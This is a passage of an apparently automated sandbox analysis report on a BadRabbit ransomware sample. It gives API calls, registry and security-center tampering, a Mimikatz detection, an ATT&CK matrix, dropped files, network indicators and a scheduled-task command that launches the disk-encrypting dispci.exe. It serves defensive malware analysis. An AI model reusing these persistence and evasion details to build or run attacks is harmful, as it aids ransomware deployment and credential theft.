          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF6FFE GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,PeekNamedPipe,Sleep,GetProcessHeap,HeapAlloc,ReadFile,StrChrW,GetProcessHeap,HeapFree,FlushFileBuffers,DisconnectNamedPipe,CloseHandle,3_2_04BF6FFE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF8192 GetLocalTime,GetSystemDirectoryW,PathAppendW,wsprintfW,3_2_04BF8192
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF57E5 LocalAlloc,GetSystemDefaultLCID,GetTimeZoneInformation,memcpy,NetWkstaGetInfo,memcpy,memcpy,NetApiBufferFree,LocalAlloc,memcpy,LocalFree,LocalFree,3_2_04BF57E5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BF1531 GetVersion,3_2_04BF1531
          Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Changes security center settings (notifications, updates, antivirus, firewall)
          Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATEJump to behavior
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'

          Stealing of Sensitive Information

          barindex
          Yara detected Mimikatz
          Source: Yara matchFile source: 19.0.D99F.tmp.7ff609750000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.2.D99F.tmp.7ff609750000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure1
          Valid Accounts          		11
          Windows Management Instrumentation          		1
          LSASS Driver          		1
          LSASS Driver          		1
          Disable or Modify Tools          		11
          Input Capture          		2
          System Time Discovery          		Remote Services11
          Archive Collected Data          		1
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium1
          Data Encrypted for Impact
          CredentialsDomainsDefault Accounts22
          Native API          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Obfuscated Files or Information          		LSASS Memory1
          File and Directory Discovery          		Remote Desktop Protocol11
          Input Capture          		22
          Encrypted Channel          		Exfiltration Over Bluetooth1
          System Shutdown/Reboot
          Email AddressesDNS ServerDomain Accounts1
          Scheduled Task/Job          		1
          Valid Accounts          		1
          Valid Accounts          		1
          DLL Side-Loading          		Security Account Manager127
          System Information Discovery          		SMB/Windows Admin Shares1
          Clipboard Data          		1
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts12
          Service Execution          		22
          Windows Service          		11
          Access Token Manipulation          		1
          File Deletion          		NTDS1
          Network Share Discovery          		Distributed Component Object ModelInput Capture2
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchd1
          Scheduled Task/Job          		22
          Windows Service          		121
          Masquerading          		LSA Secrets261
          Security Software Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
          Bootkit          		112
          Process Injection          		1
          Valid Accounts          		Cached Domain Credentials141
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
          Scheduled Task/Job          		141
          Virtualization/Sandbox Evasion          		DCSync2
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
          Access Token Manipulation          		Proc Filesystem1
          Remote System Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt112
          Process Injection          		/etc/passwd and /etc/shadow1
          System Network Configuration Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
          Bootkit          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
          Rundll32          		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
          Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task2
          Indicator Removal          		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1481356 Sample: LisectAVT_2403002C_35.exe Startdate: 25/07/2024 Architecture: WINDOWS Score: 100 72 time.windows.com 2->72 74 api.msn.com 2->74 82 Malicious sample detected (through community Yara rule) 2->82 84 Antivirus / Scanner detection for submitted sample 2->84 86 Multi AV Scanner detection for submitted file 2->86 88 10 other signatures 2->88 9 LisectAVT_2403002C_35.exe 2 2->9         started        12 cmd.exe 1 2->12         started        15 svchost.exe 2->15         started        17 15 other processes 2->17 signatures3 process4 dnsIp5 68 C:\Windows\infpub.dat, data 9->68 dropped 20 rundll32.exe 1 3 9->20         started        25 conhost.exe 9->25         started        106 Drops executables to the windows directory (C:\Windows) and starts them 12->106 27 dispci.exe 17 12->27         started        29 conhost.exe 12->29         started        108 Changes security center settings (notifications, updates, antivirus, firewall) 15->108 70 127.0.0.1 unknown unknown 17->70 110 Query firmware table information (likely to detect VMs) 17->110 file6 signatures7 process8 dnsIp9 76 104.98.116.138, 443, 445, 49701 AKAMAI-ASN1EU United States 20->76 78 192.168.2.0 unknown unknown 20->78 80 192.168.2.1, 80 unknown unknown 20->80 62 C:\Windows\dispci.exe, PE32 20->62 dropped 64 C:\Windows\cscc.dat, PE32+ 20->64 dropped 66 C:\Windows\D99F.tmp, data 20->66 dropped 90 System process connects to network (likely due to code injection or exploit) 20->90 92 Contains functionality to enumerate network shares of other devices 20->92 94 Clears the journal log 20->94 104 5 other signatures 20->104 31 cmd.exe 1 20->31         started        34 cmd.exe 1 20->34         started        36 cmd.exe 1 20->36         started        42 3 other processes 20->42 96 Antivirus detection for dropped file 27->96 98 Multi AV Scanner detection for dropped file 27->98 100 Contains functionality to infect the boot sector 27->100 102 Contains functionality to register a low level keyboard hook 27->102 38 cmd.exe 1 27->38         started        40 conhost.exe 27->40         started        file10 signatures11 process12 signatures13 112 Clears the journal log 31->112 114 Uses schtasks.exe or at.exe to add and modify task schedules 31->114 44 conhost.exe 31->44         started        46 schtasks.exe 1 31->46         started        48 conhost.exe 34->48         started        56 5 other processes 34->56 50 conhost.exe 36->50         started        52 schtasks.exe 1 36->52         started        58 2 other processes 38->58 54 conhost.exe 42->54         started        60 4 other processes 42->60 process14

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          LisectAVT_2403002C_35.exe86%ReversingLabsWin32.Ransomware.BadRabbit
          LisectAVT_2403002C_35.exe100%AviraHEUR/AGEN.1309921

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Windows\dispci.exe100%AviraTR/Diskcoder.12354
          C:\Windows\cscc.dat0%ReversingLabs
          C:\Windows\dispci.exe96%ReversingLabsWin32.Ransomware.BadRabbit

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://ocsp.thawte.com00%URL Reputationsafe
          http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
          https://dev.virtualearth.net/REST/v1/Routes/Driving0%Avira URL Cloudsafe
          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx0%Avira URL Cloudsafe
          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=0%Avira URL Cloudsafe
          https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx0%Avira URL Cloudsafe
          https://dev.virtualearth.net/REST/v1/Routes/0%Avira URL Cloudsafe
          https://dev.ditu.live.com/REST/v1/Routes/0%Avira URL Cloudsafe
          https://dev.ditu.live.com/REST/v1/Transit/Stops/0%Avira URL Cloudsafe
          http://diskcryptor.net/0%Avira URL Cloudsafe
          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=0%Avira URL Cloudsafe
          https://dev.virtualearth.net/REST/v1/Traffic/Incidents/0%Avira URL Cloudsafe
          https://dev.virtualearth.net/REST/v1/Routes/Walking0%Avira URL Cloudsafe
          https://g.live.com/odclientsettings/ProdV21C:0%Avira URL Cloudsafe
          https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?0%Avira URL Cloudsafe
          http://crl.ver)0%Avira URL Cloudsafe
          https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/0%Avira URL Cloudsafe
          https://dev.virtualearth.net/REST/v1/Locations0%Avira URL Cloudsafe
          https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/0%Avira URL Cloudsafe
          https://dev.virtualearth.net/mapcontrol/logging.ashx0%Avira URL Cloudsafe
          https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=0%Avira URL Cloudsafe
          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=0%Avira URL Cloudsafe
          http://standards.iso.org/iso/19770/-2/2009/schema.xsd0%Avira URL Cloudsafe
          https://dev.ditu.live.com/mapcontrol/logging.ashx0%Avira URL Cloudsafe
          http://192.168.2.1:80/0%Avira URL Cloudsafe
          https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=0%Avira URL Cloudsafe
          https://g.live.com/odclientsettings/Prod1C:0%Avira URL Cloudsafe
          http://192.168.2.1/8.0%Avira URL Cloudsafe
          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=0%Avira URL Cloudsafe
          https://dynamic.t0%Avira URL Cloudsafe
          https://dev.ditu.live.com/REST/v1/Imagery/Copyright/0%Avira URL Cloudsafe
          https://dev.virtualearth.net/REST/v1/Transit/Schedules/0%Avira URL Cloudsafe
          http://www.bingmapsportal.comc0%Avira URL Cloudsafe
          https://dev.virtualearth.net/REST/v1/Routes/Transit0%Avira URL Cloudsafe
          https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=0%Avira URL Cloudsafe
          http://192.168.2.1/0%Avira URL Cloudsafe
          https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen0%Avira URL Cloudsafe
          https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/0%Avira URL Cloudsafe
          https://dev.ditu.live.com/REST/v1/Locations0%Avira URL Cloudsafe
          https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=0%Avira URL Cloudsafe
          https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=0%Avira URL Cloudsafe
          https://dev.virtualearth.net/REST/v1/Imagery/Copyright/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          time.windows.com
          		unknown
          		unknownfalse
            		unknown
            api.msn.com
            		unknown
            		unknownfalse
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://diskcryptor.net/rundll32.exe, 00000003.00000003.1276657118.0000000003294000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1254573454.000000000327D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.1324901443.000000000328A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1282329442.0000000003294000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1276632248.0000000004D91000.00000004.00000020.00020000.00000000.sdmp, dispci.exe, 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmp, cscc.dat.3.dr, dispci.exe.3.drfalse
              • Avira URL Cloud: safe
              		unknown
              https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000007.00000003.1364904828.000002C81BE5D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000007.00000002.1370571619.000002C81BE68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1364477715.000002C81BE67000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000007.00000003.1365139160.000002C81BE43000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 00000007.00000002.1370673738.000002C81BE76000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1364010188.000002C81BE74000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://ocsp.thawte.com0LisectAVT_2403002C_35.exe, cscc.dat.3.drfalse
              • URL Reputation: safe
              		unknown
              https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000007.00000002.1370571619.000002C81BE68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370247161.000002C81BE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1364477715.000002C81BE67000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 00000007.00000003.1364588017.000002C81BE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370247161.000002C81BE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370524622.000002C81BE63000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000007.00000002.1370388371.000002C81BE44000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=svchost.exe, 00000007.00000003.1365139160.000002C81BE43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1364865383.000002C81BE5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370388371.000002C81BE44000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000002A.00000003.1320828736.00000172154F0000.00000004.00000800.00020000.00000000.sdmp, edb.log.42.dr, qmgr.db.42.drfalse
              • Avira URL Cloud: safe
              		unknown
              http://crl.ver)svchost.exe, 0000002A.00000002.2727131392.0000017215800000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000007.00000003.1364588017.000002C81BE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370524622.000002C81BE63000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000007.00000002.1370388371.000002C81BE44000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/svchost.exe, 00000007.00000003.1363950845.000002C81BE34000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://standards.iso.org/iso/19770/-2/2009/schema.xsdregid.1991-06.com.microsoft_Windows-10-Pro.swidtag.11.drfalse
              • Avira URL Cloud: safe
              		unknown
              https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000007.00000002.1370524622.000002C81BE63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370617675.000002C81BE70000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365044524.000002C81BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370388371.000002C81BE44000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000007.00000002.1370247161.000002C81BE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1363950845.000002C81BE34000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000007.00000002.1370344973.000002C81BE41000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://192.168.2.1:80/rundll32.exe, 00000003.00000002.1324901443.00000000032CA000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://g.live.com/odclientsettings/Prod1C:qmgr.db.42.drfalse
              • Avira URL Cloud: safe
              		unknown
              https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000007.00000002.1370344973.000002C81BE41000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://192.168.2.1/8.rundll32.exe, 00000003.00000002.1324901443.00000000032D2000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://crl.thawte.com/ThawteTimestampingCA.crl0LisectAVT_2403002C_35.exe, cscc.dat.3.drfalse
              • URL Reputation: safe
              		unknown
              https://dynamic.tsvchost.exe, 00000007.00000002.1370388371.000002C81BE44000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.bingmapsportal.comcsvchost.exe, 00000007.00000002.1370159028.000002C81BE13000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://192.168.2.1/rundll32.exe, 00000003.00000002.1324901443.00000000031FA000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=svchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000007.00000003.1364588017.000002C81BE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370524622.000002C81BE63000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000007.00000002.1370434206.000002C81BE58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365480180.000002C81BE57000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000007.00000003.1364588017.000002C81BE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370524622.000002C81BE63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1365044524.000002C81BE5A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000007.00000002.1370571619.000002C81BE68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1370247161.000002C81BE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1364477715.000002C81BE67000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000007.00000003.1363950845.000002C81BE34000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              104.98.116.138
              		unknownUnited States
              		20940AKAMAI-ASN1EUtrue

              Private

              IP
              192.168.2.0
              192.168.2.1
              127.0.0.1

              General Information

              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1481356
              Start date and time:2024-07-25 08:17:52 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 7m 23s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:55
              Number of new started drivers analysed:2
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Sample name:LisectAVT_2403002C_35.exe
              Detection:MAL
              Classification:mal100.rans.spre.troj.spyw.evad.winEXE@65/14@2/4
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 99%
              • Number of executed functions: 98
              • Number of non-executed functions: 130
              Cookbook Comments:
              • Found application associated with file extension: .exe

              Warnings

              • Connection to analysis system has been lost, crash info: Unknown
              • Exclude process from analysis (whitelisted): dllhost.exe, smss.exe, dwm.exe, csrss.exe, winlogon.exe, MoUsoCoreWorker.exe
              • Excluded IPs from analysis (whitelisted): 20.101.57.9, 184.28.90.27, 104.73.229.116, 204.79.197.203, 23.216.207.31, 2.23.209.141, 2.23.209.150, 2.23.209.154, 2.23.209.156, 2.23.209.142, 2.23.209.143, 2.23.209.144, 2.23.209.149, 2.23.209.153, 40.126.31.71, 20.190.159.68, 20.190.159.75, 20.190.159.0, 40.126.31.69, 20.190.159.64, 20.190.159.23, 20.190.159.4, 93.184.221.240, 2.23.209.176, 2.23.209.173, 2.23.209.179, 2.23.209.180, 2.23.209.178, 2.23.209.175, 2.23.209.181, 2.23.209.182, 2.23.209.177, 40.68.123.157, 20.3.187.198, 204.79.197.239, 13.107.21.239, 142.250.184.206, 52.165.165.26, 20.166.126.56, 20.242.39.171
              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, twc.trafficmanager.net, p-static.bing.trafficmanager.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, cdn.onenote.net.edgekey.net, e86303.dscx.akamaiedge.net, clients2.google.com, www.bing.com.edgekey.net, wildcard.weather.microsoft.com.edgekey.net, login.live.com, e16604.g.akamaiedge.net, r.bing.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, hlb.apr-52dd2-0.edgecastdns.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, cdn.onenote.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.bing.com, edge-microsoft-com.dual-a-0036.a-msedge.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, e15275.d.akamaiedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, r.bing.com.edgekey.net, wu.ec.azureedge.net, a-0003.a-msedge.net, tile-service.weather.microsoft.com, www.tm.v4.a.pr
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: LisectAVT_2403002C_35.exe

              Simulations

              Behavior and APIs

              TimeTypeDescription
              02:18:52API Interceptor32x Sleep call for process: rundll32.exe modified
              02:18:55API Interceptor3x Sleep call for process: svchost.exe modified
              08:18:54Task SchedulerRun new task: rhaegal path: C:\Windows\system32\cmd.exe s>/C Start "" "C:\Windows\dispci.exe" -id 1283680486 &amp;&amp; exit

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              104.98.116.138942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exeGet hashmaliciousBdaejecBrowse
                a.exeGet hashmaliciousUnknownBrowse
                  a4#Uff09.exeGet hashmaliciousBdaejec, SalityBrowse

                    Domains

                    No context

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    AKAMAI-ASN1EULisectAVT_2403002C_81.exeGet hashmaliciousVidarBrowse
                    • 23.197.127.21
                    942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exeGet hashmaliciousBdaejecBrowse
                    • 104.98.116.138
